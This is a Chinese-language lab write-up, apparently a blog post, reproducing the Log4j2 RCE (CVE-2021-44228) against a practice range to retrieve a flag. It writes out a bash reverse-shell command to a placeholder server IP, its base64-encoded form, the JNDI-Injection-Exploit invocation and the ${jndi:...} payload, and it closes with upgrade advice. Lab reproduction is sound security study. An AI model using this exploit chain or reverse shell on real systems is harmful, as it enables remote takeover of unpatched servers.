log4j2-rce-cve-2021-44228 漏洞复现

打开靶场

在这里插入图片描述

浏览器点击???,抓这个包。

在这里插入图片描述
使用工具JNDI-Injection-Exploit,开启默认端口1389、1099、8180以及自定义端口9999

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

构造反弹shell指令,1.1.1.1为服务器ip

bash -i >& /dev/tcp/1.1.1.1/9999 0>&1

使用base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzk5OTkgMD4mMQ==

输入命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.1.1.1"

在这里插入图片描述
这里我使用第一个1.2.x的,获取rmi:地址,全部复制,编辑payload参数,通过工具把要输入的参数转换成url。

${jndi:地址}

开启监听
在这里插入图片描述

执行后查看 nc监听窗口
在这里插入图片描述
getshell后
执行命令即可查看flag,复现结束

在这里插入图片描述

漏洞规避方法:更新版本

从 log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.2、2.12.3 和 2.3.1)开始,此功能已被完全删除。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值